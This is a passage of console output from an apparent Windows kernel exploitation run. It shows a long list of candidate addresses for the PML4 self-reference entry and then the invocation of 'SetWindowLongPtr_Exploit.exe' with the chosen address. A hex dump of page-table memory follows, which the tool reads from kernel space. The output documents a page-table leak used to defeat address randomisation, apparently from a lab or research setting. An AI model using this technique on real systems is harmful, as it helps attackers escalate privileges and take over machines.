Array: ffff9e4f2793c9e0\r\nLeft in Potential Array: ffff9ecf67b3d9e8\r\nLeft in Potential Array: ffff9f4fa7d3e9f0\r\nLeft in Potential Array: ffff9fcfe7f3f9f8\r\nLeft in Potential Array: ffffa05028140a00\r\nLeft in Potential Array: ffffa0d068341a08\r\nLeft in Potential Array: ffffa150a8542a10\r\nLeft in Potential Array: ffffa1d0e8743a18\r\nLeft in Potential Array: ffffa25128944a20\r\nLeft in Potential Array: ffffa2d168b45a28\r\nLeft in Potential Array: ffffa351a8d46a30\r\nLeft in Potential Array: ffffa3d1e8f47a38\r\nLeft in Potential Array: ffffa45229148a40\r\nLeft in Potential Array: ffffa4d269349a48\r\nLeft in Potential Array: ffffa552a954aa50\r\nLeft in Potential Array: ffffa5d2e974ba58\r\nLeft in Potential Array: ffffa6532994ca60\r\nLeft in Potential Array: ffffa6d369b4da68\r\nLeft in Potential Array: ffffa753a9d4ea70\r\nLeft in Potential Array: ffffa7d3e9f4fa78\r\nLeft in Potential Array: ffffa8542a150a80\r\nLeft in Potential Array: ffffa8d46a351a88\r\nLeft in Potential Array: ffffa954aa552a90\r\nLeft in Potential Array: ffffa9d4ea753a98\r\nLeft in Potential Array: ffffaa552a954aa0\r\nLeft in Potential Array: ffffaad56ab55aa8\r\nLeft in Potential Array: ffffab55aad56ab0\r\nLeft in Potential Array: ffffabd5eaf57ab8\r\nLeft in Potential Array: ffffac562b158ac0\r\nLeft in Potential Array: ffffacd66b359ac8\r\nLeft in Potential Array: ffffad56ab55aad0\r\nLeft in Potential Array: ffffadd6eb75bad8\r\nLeft in Potential Array: ffffae572b95cae0\r\nLeft in Potential Array: ffffaed76bb5dae8\r\nLeft in Potential Array: ffffaf57abd5eaf0\r\nLeft in Potential Array: ffffafd7ebf5faf8\r\nLeft in Potential Array: ffffb0582c160b00\r\nLeft in Potential Array: ffffb0d86c361b08\r\nLeft in Potential Array: ffffb158ac562b10\r\nLeft in Potential Array: ffffb1d8ec763b18\r\nLeft in Potential Array: ffffb2592c964b20\r\nLeft in Potential Array: ffffb2d96cb65b28\r\nLeft in Potential Array: ffffb359acd66b30\r\nLeft in Potential Array: ffffb3d9ecf67b38\r\nLeft in Potential Array: ffffb45a2d168b40\r\nLeft in Potential Array: ffffb4da6d369b48\r\nLeft in Potential Array: ffffb55aad56ab50\r\nLeft in Potential Array: ffffb5daed76bb58\r\nLeft in Potential Array: ffffb65b2d96cb60\r\nLeft in Potential Array: ffffb6db6db6db68\r\nLeft in Potential Array: ffffb75badd6eb70\r\nLeft in Potential Array: ffffb7dbedf6fb78\r\nLeft in Potential Array: ffffb85c2e170b80\r\nLeft in Potential Array: ffffb8dc6e371b88\r\nLeft in Potential Array: ffffb95cae572b90\r\nLeft in Potential Array: ffffb9dcee773b98\r\nLeft in Potential Array: ffffba5d2e974ba0\r\nLeft in Potential Array: ffffbadd6eb75ba8\r\nLeft in Potential Array: ffffbb5daed76bb0\r\nLeft in Potential Array: ffffbbddeef77bb8\r\nLeft in Potential Array: ffffbc5e2f178bc0\r\nLeft in Potential Array: ffffbcde6f379bc8\r\nLeft in Potential Array: ffffbd5eaf57abd0\r\nLeft in Potential Array: ffffbddeef77bbd8\r\nLeft in Potential Array: ffffbe5f2f97cbe0\r\nLeft in Potential Array: ffffbedf6fb7dbe8\r\nLeft in Potential Array: ffffbf5fafd7ebf0\r\nLeft in Potential Array: ffffbfdfeff7fbf8\r\nLeft in Potential Array: ffffc06030180c00\r\nLeft in Potential Array: ffffc0e070381c08\r\nLeft in Potential Array: ffffc160b0582c10\r\nLeft in Potential Array: ffffc1e0f0783c18\r\nLeft in Potential Array: ffffc26130984c20\r\nLeft in Potential Array: ffffc2e170b85c28\r\nLeft in Potential Array: ffffc361b0d86c30\r\nLeft in Potential Array: ffffc3e1f0f87c38\r\nLeft in Potential Array: ffffc46231188c40\r\nLeft in Potential Array: ffffc4e271389c48\r\nLeft in Potential Array: ffffc562b158ac50\r\nLeft in Potential Array: ffffc5e2f178bc58\r\nLeft in Potential Array: ffffc6633198cc60\r\nLeft in Potential Array: ffffc6e371b8dc68\r\nLeft in Potential Array: ffffc763b1d8ec70\r\nLeft in Potential Array: ffffc7e3f1f8fc78\r\nLeft in Potential Array: ffffc86432190c80\r\nLeft in Potential Array: ffffc8e472391c88\r\nLeft in Potential Array: ffffc964b2592c90\r\nLeft in Potential Array: ffffc9e4f2793c98\r\nLeft in Potential Array: ffffca6532994ca0\r\nLeft in Potential Array: ffffcae572b95ca8\r\nLeft in Potential Array: ffffcb65b2d96cb0\r\nLeft in Potential Array: ffffcbe5f2f97cb8\r\nLeft in Potential Array: ffffcc6633198cc0\r\nLeft in Potential Array: ffffcce673399cc8\r\nLeft in Potential Array: ffffcd66b359acd0\r\nLeft in Potential Array: ffffcde6f379bcd8\r\nLeft in Potential Array: ffffce673399cce0\r\nLeft in Potential Array: ffffcee773b9dce8\r\nLeft in Potential Array: ffffcf67b3d9ecf0\r\nLeft in Potential Array: ffffcfe7f3f9fcf8\r\nLeft in Potential Array: ffffd068341a0d00\r\nLeft in Potential Array: ffffd0e8743a1d08\r\nLeft in Potential Array: ffffd168b45a2d10\r\nLeft in Potential Array: ffffd1e8f47a3d18\r\nLeft in Potential Array: ffffd269349a4d20\r\nLeft in Potential Array: ffffd2e974ba5d28\r\nLeft in Potential Array: ffffd369b4da6d30\r\nLeft in Potential Array: ffffd3e9f4fa7d38\r\nLeft in Potential Array: ffffd46a351a8d40\r\nLeft in Potential Array: ffffd4ea753a9d48\r\nLeft in Potential Array: ffffd56ab55aad50\r\nLeft in Potential Array: ffffd5eaf57abd58\r\nLeft in Potential Array: ffffd66b359acd60\r\nLeft in Potential Array: ffffd6eb75badd68\r\nLeft in Potential Array: ffffd76bb5daed70\r\nLeft in Potential Array: ffffd7ebf5fafd78\r\nLeft in Potential Array: ffffd86c361b0d80\r\nLeft in Potential Array: ffffd8ec763b1d88\r\nLeft in Potential Array: ffffd96cb65b2d90\r\nLeft in Potential Array: ffffd9ecf67b3d98\r\nLeft in Potential Array: ffffda6d369b4da0\r\nLeft in Potential Array: ffffdaed76bb5da8\r\nLeft in Potential Array: ffffdb6db6db6db0\r\nLeft in Potential Array: ffffdbedf6fb7db8\r\nLeft in Potential Array: ffffdc6e371b8dc0\r\nLeft in Potential Array: ffffdcee773b9dc8\r\nLeft in Potential Array: ffffdd6eb75badd0\r\nLeft in Potential Array: ffffddeef77bbdd8\r\nLeft in Potential Array: ffffde6f379bcde0\r\nLeft in Potential Array: ffffdeef77bbdde8\r\nLeft in Potential Array: ffffdf6fb7dbedf0\r\nLeft in Potential Array: ffffdfeff7fbfdf8\r\nLeft in Potential Array: ffffe070381c0e00\r\nLeft in Potential Array: ffffe0f0783c1e08\r\nLeft in Potential Array: ffffe170b85c2e10\r\nLeft in Potential Array: ffffe1f0f87c3e18\r\nLeft in Potential Array: ffffe271389c4e20\r\nLeft in Potential Array: ffffe2f178bc5e28\r\nLeft in Potential Array: ffffe371b8dc6e30\r\nLeft in Potential Array: ffffe3f1f8fc7e38\r\nLeft in Potential Array: ffffe472391c8e40\r\nLeft in Potential Array: ffffe4f2793c9e48\r\nLeft in Potential Array: ffffe572b95cae50\r\nLeft in Potential Array: ffffe5f2f97cbe58\r\nLeft in Potential Array: ffffe673399cce60\r\nLeft in Potential Array: ffffe6f379bcde68\r\nLeft in Potential Array: ffffe773b9dcee70\r\nLeft in Potential Array: ffffe7f3f9fcfe78\r\nLeft in Potential Array: ffffe8743a1d0e80\r\nLeft in Potential Array: ffffe8f47a3d1e88\r\nLeft in Potential Array: ffffe974ba5d2e90\r\nLeft in Potential Array: ffffe9f4fa7d3e98\r\nLeft in Potential Array: ffffea753a9d4ea0\r\nLeft in Potential Array: ffffeaf57abd5ea8\r\nLeft in Potential Array: ffffeb75badd6eb0\r\nLeft in Potential Array: ffffebf5fafd7eb8\r\nLeft in Potential Array: ffffec763b1d8ec0\r\nLeft in Potential Array: ffffecf67b3d9ec8\r\nLeft in Potential Array: ffffed76bb5daed0\r\nLeft in Potential Array: ffffedf6fb7dbed8\r\nLeft in Potential Array: ffffee773b9dcee0\r\nLeft in Potential Array: ffffeef77bbddee8\r\nLeft in Potential Array: ffffef77bbddeef0\r\nLeft in Potential Array: ffffeff7fbfdfef8\r\nLeft in Potential Array: fffff0783c1e0f00\r\nLeft in Potential Array: fffff0f87c3e1f08\r\nLeft in Potential Array: fffff178bc5e2f10\r\nLeft in Potential Array: fffff1f8fc7e3f18\r\nLeft in Potential Array: fffff2793c9e4f20\r\nLeft in Potential Array: fffff2f97cbe5f28\r\nLeft in Potential Array: fffff379bcde6f30\r\nLeft in Potential Array: fffff3f9fcfe7f38\r\nLeft in Potential Array: fffff47a3d1e8f40\r\nLeft in Potential Array: fffff4fa7d3e9f48\r\nLeft in Potential Array: fffff57abd5eaf50\r\nLeft in Potential Array: fffff5fafd7ebf58\r\nLeft in Potential Array: fffff6fb7dbedf68\r\nLeft in Potential Array: fffff77bbddeef70\r\nLeft in Potential Array: fffff7fbfdfeff78\r\nLeft in Potential Array: fffff87c3e1f0f80\r\nLeft in Potential Array: fffff8fc7e3f1f88\r\nLeft in Potential Array: fffff97cbe5f2f90\r\nLeft in Potential Array: fffff9fcfe7f3f98\r\nLeft in Potential Array: fffffa7d3e9f4fa0\r\nLeft in Potential Array: fffffafd7ebf5fa8\r\nLeft in Potential Array: fffffb7dbedf6fb0\r\nLeft in Potential Array: fffffbfdfeff7fb8\r\nLeft in Potential Array: fffffc7e3f1f8fc0\r\nLeft in Potential Array: fffffcfe7f3f9fc8\r\nLeft in Potential Array: fffffd7ebf5fafd0\r\nLeft in Potential Array: fffffdfeff7fbfd8\r\nLeft in Potential Array: fffffe7f3f9fcfe0\r\nLeft in Potential Array: fffffeff7fbfdfe8\r\nLeft in Potential Array: ffffff7fbfdfeff0\r\nLeft in Potential Array: fffffffffffffff8\r\nLeft in Final Array: fffff67b3d9ecf60\r\nResult: fffff67b3d9ecf60\r\nRun SetWindowLongPtr_Exploit.exe\r\nC:\\Users\\qa\\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60\r\nMy PID is: 6056\r\nCurrent Username: qa\r\nPML4 Self Ref: FFFFF67B3D9ECF60\r\nEnter to continue...\r\n\r\n Value Self Ref = 8000000100211867\r\n000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k....\r\n000000003D9EC010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh..............\r\n000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC3F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC400 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC410 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC420 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC430 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC440 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC450 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC460 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC470 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC480 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC490 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC4F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC500 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC510 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC520 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC530 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC540 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC550 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC560 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC570 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC580 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC590 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC5F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC600 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC610 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC620 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC630 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC640 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC650 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC660 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC670 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC680 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC690 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC6F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC700 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC710 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC720 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC730 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC740 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC750 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC760 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC770 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC780 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC790 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC7F0 | 00 00 00 00 00 00 00 00 67 08 b9 4d 00 00 60 02 | ........g..M..`.\r\n000000003D9EC800 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC810 | 63 f8 ff 3f 01 00 00 00 63 38 88 00 00 00 00 80 | c..?....c8......\r\n000000003D9EC820 | 63 38 88 00 00 00 00 80 63 38 88 00 00 00 00 80 | c8......c8......\r\n000000003D9EC830 | 63 38 88 00 00 00 00 80 63 d8 ff 3f 01 00 00 00 | c8......c..?....\r\n000000003D9EC840 | 63 b8 ff 3f 01 00 00 00 00 00 00 00 00 00 00 00 | c..?............\r\n000000003D9EC850 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC860 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC870 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC880 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC890 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8C0 | 63 a8 3f 0f 01 00 00 00 00 00 00 00 00 00 00 00 | c.?.............\r\n000000003D9EC8D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC8F0 | 00 00 00 00 00 00 00 00 63 18 35 02 00 00 00 00 | ........c.5.....\r\n000000003D9EC900 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC910 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC920 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC930 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC940 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC950 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC960 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC970 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC980 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC990 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9EC9F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA10 | 00 00 00 00 00 00 00 00 63 d8 47 00 00 00 00 00 | ........c.G.....\r\n000000003D9ECA20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECA90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECAF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB20 | 00 00 00 00 00 00 00 00 63 18 8b 00 00 00 00 00 | ........c.......\r\n000000003D9ECB30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | 